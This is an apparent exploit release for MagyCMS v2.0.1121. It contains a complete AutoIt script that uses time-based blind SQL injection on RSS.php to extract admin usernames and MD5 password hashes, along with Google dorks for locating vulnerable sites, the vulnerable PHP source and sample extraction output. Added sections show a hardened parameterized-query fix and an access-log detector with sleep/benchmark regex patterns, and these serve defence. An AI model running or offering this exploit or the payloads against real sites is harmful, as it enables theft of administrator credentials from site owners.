Hello Dear ЗАРАЗА,
Please see the attachment.
The attached file is a commented and complete exploit written in AutoIt.
It exploits the targeted CMS using a time-based technique and obtains the default 5 usernames + corresponding MD5 passwords from the target site.
If anything is unclear, please let us know.
TIA as always.
/AkaStep
poc.au3
#Region ;**** Directives created by AutoIt3Wrapper_GUI****
#AutoIt3Wrapper_Outfile=cpl.exe
#AutoIt3Wrapper_UseUpx=n
#AutoIt3Wrapper_Change2CUI=y
#EndRegion ;**** Directives created by AutoIt3Wrapper_GUI****
#NoTrayIcon
#include <Array.au3>
#include <Inet.au3>
#include <String.au3>
#include <File.au3>
#cs
THIS IS A COMPLETE EXPLOIT WHICH IS WRITTEN IN THE AUTOIT SCRIPTING/PROGRAMMING LANGUAGE.
THIS IS A CONSOLE APPLICATION.
ITS MAIN PURPOSE IS TO EXPLOIT A BLIND SQL INJECTION VULNERABILITY IN MagyCMS v2.0.1121 BETA USING A TIME-BASED TECHNIQUE and obtain usernames + MD5 passwords.
By default it obtains 5 usernames and the corresponding MD5 PASSWORDS from the vulnerable site.
Since it uses a time-based technique it is a really slow exploit, but it is more convenient than manual work;)
In fact I coded it for fun because we always prefer manual work.
#ce
#cs
============ * AZERBAIJAN BLACK HATZ PRESENTS!) * ==================
Vulnerable Software: MagyCMS v2.0.1121 BETA (Previous and Newest versions also affected)
Vendor: http://www.emagy.com && broncoway.com
ShouTz to mariaoza;)
CAMOUFL4G3 says: FreeDom is Paradise :P
DORK 1:
google+ site:am Website by Broncoway
DORK 2: google+ site:am inurl: /magycms/
Admin Panel:
site.tld/magycms/Admin/
or
site.tld/magycms/Admin/Login.php
Demo: http://www.sgp.am
Example usage of exploit:
cmd.exe
> D:\programming1\magy_exploit\poc_HAZIR_USERNAME_DONE\x_azirmagy_exploit>cpl.exe http://192.168.0.15/learn/pwnmagyasap/
######################################################
######################################################
[+] Reply from target site: [+]
[+] Trying to get average value for sleep(1) if condition is TRUE…[+]
[+] TRUE AT OFFSET [0] Currently : [m]. Responce Time: 1066.51545360847 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [ma]. Responce Time: 1044.58516260608 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [man]. Responce Time: 1086.89845022196 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [mana]. Responce Time: 1046.11742474319 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [manag]. Responce Time: 1070.21242516611 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [manage]. Responce Time: 1063.79253086555 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [0] Currently : [manager]. Responce Time: 1107.93347514309 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [r]. Responce Time: 1079.4193285235 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [ro]. Responce Time: 1092.09901537247 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [roo]. Responce Time: 1266.5817253381 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [1] Currently : [root]. Responce Time: 1097.96913476208 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [2] Currently : [d]. Responce Time: 1082.47758977717 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [t]. Responce Time: 1074.85995733176 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [te]. Responce Time: 1088.53933904958 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [tes]. Responce Time: 1080.99278273973 ms. Logging to axa.txt… [+]
[+] TRUE AT OFFSET [3] Currently : [test]. Responce Time: 1073.98846265903 ms. Logging to axa.txt… [+]
Total 4 users *
[+] Exit! [+]
Vulnerable Code Section:
========================== BEGIN ===================================
//magycms/Framework/public/RSS.php?Page=
/*
<?
// Check if data.inc.php is included
if(!isset($FRAMEWORK_PATH))
require_once(dirname(__FILE__)."/…/…/Admin/Inc/data.inc.php");
require_once(dirname(__FILE__)."/…/Common.php");
require_once(dirname(__FILE__)."/…/Links.php");
require_once(dirname(__FILE__)."/…/URL.php");
require_once($CMS_ROOTPATH . 'Admin/Inc/db/adodb.inc.php');
/**
* Returns News Category for page with passed name
*
* @param string $page
* @return int ID of category
*/
function getCatByPage($page)
{
global $db, $tbl_Pages, $tbl_News_Config, $SITEID;
// Get Page ID for fetching Category
$query = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID";
$hResult = $db->Execute($query);
if (!$hResult->NumRows())
return -1;
$row = $hResult->FetchRow();
$ID = $row[0];
// Fetch category form DB;
$query = "SELECT `Category` FROM $tbl_News_Config WHERE `ID`=$ID AND `site`=$SITEID";
$hResult = $db->Execute($query);
if (!$hResult->NumRows())
return -1;
$row = $hResult->FetchRow();
return $row[0];
}
//////////////////// Opening database connection ////////////////
$db = &ADONewConnection($DBType);
$db->PConnect($DBServer,$DBUserName,$DBPassword,$DBName);
// Switch to the specified charset
if($DBType=="mysql") $db->Execute("SET NAMES \"$DBCharset\"");
///////////////////////// Get Site ID ///////////////////////////
if (isset($_GET['site'])) {
$SITEID = $_GET['site'];
if (!is_numeric($SITEID))
$SITEID = 1;
} else {
$SITEID = 1;
}
////////////////// Get site URL from DB /////////////////////////
$hResult = $db->Execute("SELECT `URL` FROM $tbl_Sites WHERE `ID`=$SITEID");
$Root_URL = "aaa";
if ($hResult->NumRows())
{
$row = $hResult->FetchRow();
$Root_URL = $row[0];
}
//echo($Root_URL."<br>");
////////////////// Retrieving Language Prefixes /////////////////
$Lang_Prefix = array();
$hpResult = $db->Execute("SELECT `ID`, `Prefix` FROM $tbl_Lang WHERE `site`=$SITEID");
if($hpResult) {
for($i = 0; $i < $hpResult->RowCount(); $i++) {
$apResult = $hpResult->FetchRow();
$Lang_Prefix[$apResult[0]] = $apResult[1];
}
}
///////////////////////// Determine language ////////////////////
if (isset($_GET['lang'])) {
$lang = $_GET['lang'];
if (!is_numeric($lang))
$lang = GetSiteSetting('Default_lang');
} else {
$lang = GetSiteSetting('Default_lang');
}
///////////////////////// Determine news Page and Category //////
$cat = -1;
$page = "";
if (isset($_GET['Page'])) {
$page = $_GET['Page'];
$cat = getCatByPage($page);
}
//////////////////// Get Page information if such exists ////////
$title = "News";
$text = "";
if ($page != "")
{
$pQuery = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID";
$hResult = $db->Execute($pQuery);
if (!$hResult->NumRows())
return -1;
$row = $hResult->FetchRow();
$ID = $row[0];
// Fetch Title and Text form DB;
$pQuery = "SELECT Title, Text
FROM $tbl_News_Config AS s INNER JOIN $tbl_News_Config_Data AS d ON s.ID = d.ID
WHERE s.ID=$ID AND d.language=$lang AND site=$SITEID";
$hResult = $db->Execute($pQuery);
if ($hResult->NumRows())
{
$row = $hResult->FetchRow();
$title = $row[0];
$text = $row[1];
}
}
// Construct link to News page
$mainLink = ($page == "") ? "" : $Root_URL.CLink::construct($page, $lang);
///////////////////////// GET NEWS //////////////////////////////
if ($cat == -1)
$mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date`
FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID`
WHERE d.language=$lang AND s.`site`=$SITEID";
else
$mainQuery = "SELECT s.`ID`, s.`Date`, d.`Title`, d.`ShortText` , `start_date` , `end_date`
FROM $tbl_News_Struct AS s INNER JOIN $tbl_News_Data AS d ON s.`ID`=d.`ID`
WHERE d.language=$lang AND s.`site`=$SITEID AND s.`Category`=$cat";
$hResult = $db->Execute($mainQuery);
// check if there is something to echo
if (!$hResult->NumRows())
die();
///////////////////////// Echo News in RSS //////////////////////
CRSS::echoHeader($title, $mainLink, $text, getdate(), $Lang_Prefix[$lang]);
for ($i = 0; $i < $hResult->NumRows(); $i++)
{
$row = $hResult->FetchRow();
$today = date("Y-m-d H:i:s");
$startDate = $row[4];
$endDate = $row[5];
$startDateIsOK = (substr($startDate, 0, 10) == "0000-00-00" || $today >= $startDate);
$endDateIsOK = (substr($endDate, 0, 10) == "0000-00-00" || $today <= $endDate);
if ( $startDateIsOK && $endDateIsOK )
{
$link = $Root_URL.CURL::getFormattedURL(CLink::construct($page, $lang), "id", "{$row[0]}");
CRSS::echoItem($row[2], $link, $link, $row[1], $row[3]);
}
}
CRSS::echoFooter();
?>
<?
class CRSS {
public static function echoHeader ($title, $link, $desc, $lastBD, $lang)
{
// send XML header
header('Content-Type: application/rss+xml; charset=utf-8');
// echo XML header
echo('<?xml version="1.0" encoding="utf-8"?>');
// echo RSS opening tags
echo('<rss version="2.0"><channel>\n');
if ($title != "") echo ("<title>$title</title>\n");
if ($link != "") echo ("<link>$link</link>\n");
if ($desc != "") echo ("<description>$desc</description>\n");
if ($lastBD != "") echo ("<lastBuildDate>$lastBD Mon, 12 Sep 2005 18:37:00 GMT</lastBuildDate>\n");
if ($lang != "") echo ("<language>$lang en-us</language>\n");
}
public static function echoFooter ()
{
// echo RSS closing tags
echo('</channel></rss>');
}
public static function echoItem($title, $link, $guid, $pubDate, $desc)
{
// Strip undesired characters from description
$desc = ereg_replace("&[^;]*;", "", $desc);
$desc = strip_tags($desc);
// Turn Published date into RFC format
$time = strtotime($pubDate);
$pubDate = gmdate("r", $time);
// Echo the item
echo ("<item>\n");
if ($title != "") echo ("<title>$title</title>\n");
if ($link != "") echo ("<link>$link</link>\n");
if ($guid != "") echo ("<guid>$guid</guid>\n");
if ($pubDate != "") echo ("<pubDate>$pubDate</pubDate>\n");
if ($desc != "") echo ("<description>$desc</description>\n");
echo ("</item>\n");
}
}
?>
*/
========================= END OF VULNERABLE CODE SECTION ===========================
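A hardened counterpart to the `getCatByPage()` function from `Framework/public/RSS.php` quoted above, written here as an added example; it is neither MagyCMS code nor the exploit author's. It assumes an ADOdb connection in `$db` and the same `$tbl_Pages`, `$tbl_News_Config` and `$SITEID` globals that `data.inc.php` provides in the original, and uses ADOdb's `Execute($sql, $inputarr)` form with `?` placeholders for bound values. The vulnerable shape is reproduced first for comparison. The hardened version binds every user-controlled value, casts the numeric inputs, and checks for a failed `Execute()` itself, so the fatal "Call to a member function NumRows() on a non-object" message that the exploit uses as its vulnerability check is never produced by this code path.

```php
<?php
// Added example, not MagyCMS code. Assumes an ADOdb connection in $db and the
// globals $tbl_Pages, $tbl_News_Config and $SITEID set up by data.inc.php.

// --- Vulnerable form, as in Framework/public/RSS.php ------------------------
// $page is $_GET['Page'] copied verbatim into the SQL text. A quote in the
// parameter closes the string literal and the rest of the input is executed
// as SQL; a conditional sleep() placed there is what the time-based exploit
// measures. When the broken query makes Execute() return false, NumRows() is
// called on a non-object and PHP prints the fatal error the exploit greps for.
function getCatByPage_vulnerable($page)
{
    global $db, $tbl_Pages, $tbl_News_Config, $SITEID;
    $query = "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`='$page' AND `site`=$SITEID";
    $hResult = $db->Execute($query);
    if (!$hResult->NumRows())
        return -1;
    $row = $hResult->FetchRow();
    $ID = $row[0];
    $query = "SELECT `Category` FROM $tbl_News_Config WHERE `ID`=$ID AND `site`=$SITEID";
    $hResult = $db->Execute($query);
    if (!$hResult->NumRows())
        return -1;
    $row = $hResult->FetchRow();
    return $row[0];
}

// --- Hardened form -----------------------------------------------------------
// 1. Every user-controlled value travels as a bound parameter, never as part
//    of the SQL text, so quotes and comment markers in $page are plain data.
// 2. Numeric inputs are cast to int (is_numeric() alone still accepts forms
//    such as "1e3" that are not what the schema expects).
// 3. A false return from Execute() is handled here: details go to the server
//    log and the caller only sees "no category", so no error text reaches the
//    client to serve as an oracle.
function getCatByPage_hardened($page)
{
    global $db, $tbl_Pages, $tbl_News_Config, $SITEID;

    $siteId = (int) $SITEID;
    // ?Page[]=x would arrive as an array; only a non-empty string is a page name.
    if (!is_string($page) || $page === '') {
        return -1;
    }

    $hResult = $db->Execute(
        "SELECT `ID` FROM `$tbl_Pages` WHERE `Name`=? AND `site`=?",
        array($page, $siteId)
    );
    if ($hResult === false) {
        error_log('RSS.php page lookup failed: ' . $db->ErrorMsg());
        return -1;
    }
    if ($hResult->EOF) {
        return -1;                          // no such page
    }
    $id = (int) $hResult->fields[0];

    $hResult = $db->Execute(
        "SELECT `Category` FROM `$tbl_News_Config` WHERE `ID`=? AND `site`=?",
        array($id, $siteId)
    );
    if ($hResult === false) {
        error_log('RSS.php category lookup failed: ' . $db->ErrorMsg());
        return -1;
    }
    if ($hResult->EOF) {
        return -1;
    }
    return (int) $hResult->fields[0];
}

// The page-level input handling around the function gets the same treatment:
// cast, range-check, and fall back to the defaults the original uses.
$SITEID = isset($_GET['site']) ? (int) $_GET['site'] : 1;
if ($SITEID < 1) {
    $SITEID = 1;
}
$cat  = -1;
$page = '';
if (isset($_GET['Page']) && is_string($_GET['Page'])) {
    $page = $_GET['Page'];
    $cat  = getCatByPage_hardened($page);
}
```

The `$lang` value in the same file is interpolated into the news queries after only an `is_numeric()` check, and the `$tbl_Sites` lookup uses `$SITEID` the same way; the cast-and-bind pattern above applies to those queries unchanged. Setting `display_errors` off in production PHP (with `log_errors` on) is a separate safety net: it keeps an unhandled query failure from printing the fatal-error text, but it does not make the query itself safe, which only the bound parameters do.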
mysql> show tables \g
+--------------------------+
| Tables_in_SNIP_SNIP_SNIP |
+--------------------------+
| admin_menus              |
| admin_menus_category     |
| admin_menus_permissions  |
| admin_users              |
| banner_categories        |
| banners                  |
| banners_data             |
| banners_struct           |
| cms_languages            |
| cms_messages_categories  |
| cms_messages_data        |
| cms_messages_struct      |
| cms_settings             |
| core_messages            |
| counter                  |
+--------------------------+
15 rows in set (0.00 sec)
mysql> explain admin_users \g
+----------+------------------+------+-----+---------+----------------+
| Field    | Type             | Null | Key | Default | Extra          |
+----------+------------------+------+-----+---------+----------------+
| ID       | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| Username | varchar(100)     | YES  |     | 0       |                |
| Password | varchar(100)     | YES  |     | 0       |                |
| GUID     | varchar(32)      | YES  |     | 0       |                |
| Level    | int(10) unsigned | YES  | MUL | 0       |                |
| Name     | varchar(100)     | YES  |     | 0       |                |
| Email    | varchar(45)      | YES  |     | 0       |                |
| MID      | int(10) unsigned | YES  |     | 0       |                |
+----------+------------------+------+-----+---------+----------------+
8 rows in set (0.00 sec)
A R E Y O U R E A D Y?
LETS GOOOOOOOOOOOOOOOOOOOOOOOOOOO!
#ce
Global $USERNAMES_IN_ARRAY,$MD5HASHSTRINGSIN_ARRAY,$dd
;// COMMAND LINE //
if $CmdLine[0]=0 Then
MsgBox(64,"","This is a console application." & @CRLF & "Usage: " & @CRLF & @ScriptName & ' http://targetsite.tld')
Exit
EndIf
$host=$CmdLine[1]
if $host='' Then
ConsoleWrite(@CRLF & '[+] Empty Command Line Argument? WTF? [+]' & @CRLF)
Exit
EndIf
ConsoleWrite(@CRLF)
$hellomsg= _StringRepeat('#',54) & @CRLF
$allmsg=$hellomsg & '# MagyCMS v2.0.1121 BETA Blind SQL Injection Exploit #' & @CRLF & _
'# Exploitation technique: Time Based #' & @CRLF & _
'# Author: AkaStep & BOT_25 #' & @CRLF & _
$hellomsg;
ConsoleWrite($allmsg);
$useragent='Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1';
#cs
First checking is here any internet connection?
#ce
$separator=@CRLF & _StringRepeat('-',40) & @CRLF;
ConsoleWrite($separator & '[+] Verifying your internet connection… Please Wait…[+] ' & $separator)
Sleep(1500)
$hcheckconnectionstatus='http://packetstormsecurity.org';// 100% TODD will kill me ASAP for this xD)
HttpSetUserAgent($useragent)
$is_offline_or_online=_INetGetSource($hcheckconnectionstatus,True);
if @error Then
ConsoleWrite($separator & "[+] Sorry Dude! It seems your machine is offline. [+] " & @CRLF & "[+] Can't continue…Exit. [+] " & $separator);
Exit
EndIf
ConsoleWrite($separator & '[+] Inet Connection is OK … [+] ' & $separator)
$target=$host & "/magycms/Framework/public/RSS.php?Page="
;// Vulnerable versions of MagyCMS always panic here and expose the following message to the public.
$isvulnerable='Call to a member function NumRows() on a non-object';// Peace of Blah Blah Stuff :P
$possiblevals='';//initializing of variable…
$forusernames='';// initializing it too…
for $i=28 to 61
$forusernames&=Chr(Asc("A")+$i) & @CRLF
Next
for $i=0 To 9
$possiblevals&=$i & @CRLF
; nums from 0 1 2 3 4 5 6 7 8 up to 9
Next
; then alphas from a b c d e up to f
$forusernames&=$possiblevals;
$possiblevals&='a' & @CRLF & 'b' & @CRLF & 'c' & @CRLF & 'd' & @CRLF & 'e' & @CRLF & 'f' & @CRLF
$array=StringSplit($possiblevals,@CRLF,3)
$bruteusernames=StringSplit($forusernames,@CRLF,3);
$i='';//reset.
ConsoleWrite($separator & '[+] Verifying is Target Site Vulnerable? Please wait…[+]' & $separator);
$maybe=_INetGetSource($target & "'",TRUE) ;//verifying…Is target site vulnerable?
if StringInStr($maybe,$isvulnerable,0) Then
$true='vulnerable'; // GPC=OFF
ConsoleWrite($separator & '[+] Reply from target site: [+]' & @CRLF & $separator & '[+] - - - - * Vulnerable! * - - - - . [+]' & $separator & @CRLF & _
'[+] Trying to get average value for sleep(1) if condition is TRUE…[+]' & @CRLF & $separator & '[+] Please wait… [+] ' & $separator & @CRLF);
$additionalchecking_needed='false';
;// Will check 3 times (with TRUE condition) to get optimal avg value.
;//////////////////// Responce time when condition is TRUE //////////////
local $docalc;
for $i=1 to 3
$checkfirsttime=TimerInit();
HttpSetUserAgent($useragent);
_INetGetSource($target & "' or (select if(8='8',sleep(1),0))– AnD 9='9",True);
$rtime=TimerDiff($checkfirsttime);
$docalc+=$rtime;
Next
$checkfirsttime='';
$rtime='';
$i='';
$docalcavg=Int($docalc/3);//avg value for sleep(1).
$docalc='';
ConsoleWrite($separator & '[+] AVG sleep timeout FOR TRUE CONDITION IS: ' & $docalcavg & ' ms [+]' & $separator);
;////////////// EOF TRUE CONDITION CHECKING ///////////////////////////
;////////////////////// WITH FALSE CONDITION ///////////////////////////
for $i=1 to 3
$checkfirsttime=TimerInit();
HttpSetUserAgent($useragent);
_INetGetSource($target & "' or (select if(8='index.php',sleep(1),0))– AnD 9='9",True);
$rtime=TimerDiff($checkfirsttime);
$docalc+=$rtime;
Next
$checkfirsttime='';
$rtime='';
$i='';
$avgfalsecondition=Int($docalc/3);
$docalc='';
ConsoleWrite($separator & '[+] AVG sleep timeout FOR FALSE CONDITION IS: ' & $avgfalsecondition & ' ms [+] ' & $separator);
;//////////////// END OF FALSE CONDITION ///////////////////////////////
getusername();// Fetch usernames Baby)//
Else
$true='not vulnerable'; //GPC =ON ?
ConsoleWrite($separator & '[+] Target Site is NOT vulnerable:( .Exit. [+]' & $separator)
;// Lazy to verify it using another technique.
Exit
EndIf
Func getusername()
;//Brain f****cking
Local $oldoffset=0
$USERNAMES='';
ConsoleWrite($separator & '[+] Getting To Fetch Username(s) from table… Please wait… [+] ' & $separator)
$usernamen='';
$tyi=0;
$x=0;
$stopat=0;
do
$tyi+=1
$stopat+=1
if $tyi=21 Then
$tyi=1;
$x+=1
$USERNAMES&=$usernamen & @CRLF
$usernamen='';//reset
EndIf
$limitval= ' limit 1 offset ' & $x
if $x<6 and $stopat<=5160 Then
for $q=1 To UBound($bruteusernames) - 2
$fetch_username=$target & "' or (select if(substr(Username," & $tyi & ",1)='" & $bruteusernames[$q] & "',sleep(1),0) from admin_users" &$limitval & ")– AnD 4='4" & @CRLF
$timer=TimerInit();
HttpSetUserAgent($useragent);
$inethandle=_INetGetSource($fetch_username,True)
$diftime=TimerDiff($timer);
if ($diftime/$docalcavg)>=0.8 Then
$usernamen&=$bruteusernames[$q]
ConsoleWrite('[+] TRUE AT OFFSET [' & $x & '] Currently : [' & $usernamen & ']. Responce Time: ' & $diftime & ' ms. Logging to axa.txt… [+]' & @CRLF);
FileWrite('axa.txt',$separator & @CRLF & '[+] TRUE AT OFFSET[' & $x & ']' & @CRLF & $usernamen & @CRLF & 'Current Payload: ' & $fetch_username & @CRLF &'Responce Time: ' & $diftime & ' ms ' & @CRLF & $separator)
EndIf
$timer='';
$inethandle='';
$diftime='';
Next
;//
EndIf
until $x=6
$USERNAMES_IN_ARRAY=StringSplit($USERNAMES,@CRLF,3);
; debug ok _ArrayDisplay($USERNAMES_IN_ARRAY);
$y='';
for $i=0 to UBound($USERNAMES_IN_ARRAY) - 1
if Not $USERNAMES_IN_ARRAY[$i]='' Then
$y+=1;
ConsoleWrite($separator & '[#] Username' & $i & ' => [' & $USERNAMES_IN_ARRAY[$i] & '] [#]' & $separator)
EndIf
Next
$i='';
ConsoleWrite($separator & '* Total ' & $y & ' users *' & $separator)
$y='';
ConsoleWrite($separator & '[+] END OF USERNAME FETCHING. PREVIOUS RECORDS ARE COMPLETE USERNAMES [+]' & $separator)
ConsoleWrite($separator & '[+] GOING TO FETCH MD5 PASSWORDS. This may take few minutes too. Please wait… [+]' & $separator)
;// debug ok! Exit //
MD5EDPASSWORD();//Yeah baby it's time to fetch MD5 passwords.//
EndFunc;=> getusername();
;//Below:Get passwords Function.
Func MD5EDPASSWORD()
Local $stopat;
Local $md5hash;
$MD5HASHSTRINGS='';
if $true='vulnerable' Then
for $rt=0 To 6
if not $md5hash='' Then
$MD5HASHSTRINGS&=$md5hash & @CRLF
EndIf
$md5hash='';// we need reset obtained hash here if offset incremented.
$stopat+=1;
if $rt<6 And $stopat<=3072 Then
for $x=1 to 32 ;// because => strlen('MD5-ED-STRING')=32 . We need loop through it.
for $i=0 to UBound($array) - 2
$dynamicpayload="' or (select if(substr(Password," & $x & ",1)='" & $array[$i] & "',sleep(1),0) from admin_users limit 1 offset " & $rt & ")– AND 5='5"
$doittime=TimerInit();
HttpSetUserAgent($useragent);
$trigger2=_INetGetSource($target & $dynamicpayload,TRUE)
$responcetime=TimerDiff($doittime);
if ($responcetime/$docalcavg) >=0.8 Then ;//Sleep()-ed. 99% chance that we got it!
$md5hash&=$array[$i]
$howmuchneeded=32-StringLen($md5hash);
if $howmuchneeded='0' then
$howmuchneeded=' NONE '
EndIf
$tolog=$separator & '[+] TRUE AT OFFSET [' & $rt & '] [+]' & @CRLF & 'Currently MD5 hash is : ' & $md5hash & @CRLF & 'Responce Time: ' & $responcetime & ' ms.' & @CRLF & 'Need to fetch other: [' & $howmuchneeded & '] symbol(s). ' & @CRLF & 'Logging to axa.txt… ' & $separator
ConsoleWrite($tolog);
FileWrite('axa.txt',$tolog);
$tolog='';
EndIf
Next
Next
EndIf
Next
;// DISPLAYING PLUS SAVING TO MAINLOG.TXT
$MD5HASHSTRINGS_IN_ARRAY=StringSplit($MD5HASHSTRINGS,@CRLF,3);
for $i=0 To UBound($USERNAMES_IN_ARRAY) - 2
if Not $USERNAMES_IN_ARRAY[$i]='' and Not $MD5HASHSTRINGS_IN_ARRAY[$i]='' Then
$dd&=$separator & 'Username: [' & $USERNAMES_IN_ARRAY[$i] & '] MD5 HASH: [' & $MD5HASHSTRINGS_IN_ARRAY[$i] & ']' & $separator
EndIf
Next
ConsoleWrite($separator & $dd & $separator)
FileWrite(@ScriptDir & "\mainlog.txt",$separator & 'Target Site: ' & $host & @CRLF & $dd & @CRLF)
ConsoleWrite($separator & '[+] Usernames And MD5 passwords saved to : mainlog.txt [+]' & $separator)
for $i=0 to 2
Sleep(1000);
Beep(200,300);
Next
ConsoleWrite($separator & '[+] Exploit Finished!. GooD Luck;) [+]' & $separator)
ConsoleWrite('[+] Exit! [+]');
Exit;
EndIf
EndFunc;=> MD5EDPASSWORD();
#cs
Thats All!
Thanks + Respect to all friends!
/AkaStep & BOT_25
#ce
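The exploit above works entirely over plain GET requests to `Framework/public/RSS.php`, so every probe it sends ends up in the web server's access log. The following is an added example, not part of the exploit or of MagyCMS: it scans combined-format access-log lines for requests to that script whose query string carries a time-delay SQL injection probe. The log lines at the bottom are constructed for this example (documentation IP ranges); the request shapes follow the payloads visible in the exploit, without the trailing comment marker.

```php
<?php
// Added example, not the exploit author's code or MagyCMS code: flag access-log
// lines that send a time-delay SQL injection probe to RSS.php.

// Patterns are applied to the URL-decoded, lower-cased query string, so
// %27/%28 encoding and case games (AnD, SlEeP) do not hide them. The most
// specific label is listed first and wins.
function sqliDelayMarkers()
{
    return array(
        'conditional delay' => '/\bif\s*\(.*\b(?:sleep|benchmark)\s*\(/',
        'sleep() call'      => '/\bsleep\s*\(/',
        'benchmark() call'  => '/\bbenchmark\s*\(/',
    );
}

// Parse one Apache/nginx "combined" log line into its fields, or null.
function parseCombinedLine($line)
{
    $re = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    return array(
        'client' => $m[1], 'time' => $m[2], 'method' => $m[3],
        'url' => $m[4], 'status' => (int) $m[5], 'bytes' => $m[6],
    );
}

// Return one alert per line that targets RSS.php with a delay marker.
function scanAccessLog(array $lines)
{
    $alerts = array();
    foreach ($lines as $n => $line) {
        $req = parseCombinedLine($line);
        if ($req === null) {
            continue;
        }
        $path  = (string) parse_url($req['url'], PHP_URL_PATH);
        $query = (string) parse_url($req['url'], PHP_URL_QUERY);
        if (stripos($path, '/Framework/public/RSS.php') === false) {
            continue;
        }
        // Decode twice: some clients double-encode, and a second pass over an
        // already-decoded string changes nothing that matters for this check.
        $decoded = strtolower(urldecode(urldecode($query)));
        foreach (sqliDelayMarkers() as $label => $re) {
            if (preg_match($re, $decoded)) {
                $alerts[] = array(
                    'line' => $n + 1, 'client' => $req['client'],
                    'time' => $req['time'], 'marker' => $label,
                    'status' => $req['status'],
                );
                break;
            }
        }
    }
    return $alerts;
}

// Constructed sample log: one normal feed fetch, two probes, one unrelated hit.
$sampleLog = array(
    '198.51.100.10 - - [02/Sep/2012:14:02:11 +0400] "GET /magycms/Framework/public/RSS.php?Page=news HTTP/1.1" 200 1834 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [02/Sep/2012:14:02:13 +0400] "GET /magycms/Framework/public/RSS.php?Page=%27%20or%20(select%20if(8%3D%278%27,sleep(1),0))%20AnD%209%3D%279 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1"',
    '203.0.113.7 - - [02/Sep/2012:14:02:15 +0400] "GET /magycms/Framework/public/RSS.php?Page=%27%20or%20(select%20if(substr(Username,1,1)%3D%27a%27,sleep(1),0)%20from%20admin_users%20limit%201%20offset%200)%20AnD%204%3D%274 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1"',
    '198.51.100.11 - - [02/Sep/2012:14:02:20 +0400] "GET /magycms/Admin/Login.php HTTP/1.1" 200 912 "-" "Mozilla/5.0"',
);

foreach (scanAccessLog($sampleLog) as $a) {
    printf("line %d: %s at %s -> %s (HTTP %d)\n",
        $a['line'], $a['client'], $a['time'], $a['marker'], $a['status']);
}
```

Two further signals are worth correlating in practice. The exploit issues hundreds of requests per character position from one client, all to the same script and all with a near-empty response body, so request rate per client and `RSS.php` with a zero-byte `200` are cheap secondary indicators. If the server logs response time (Apache's `%D` in `LogFormat` records it in microseconds), the roughly one-second responses of the "true" branch stand out from the normal feed fetches.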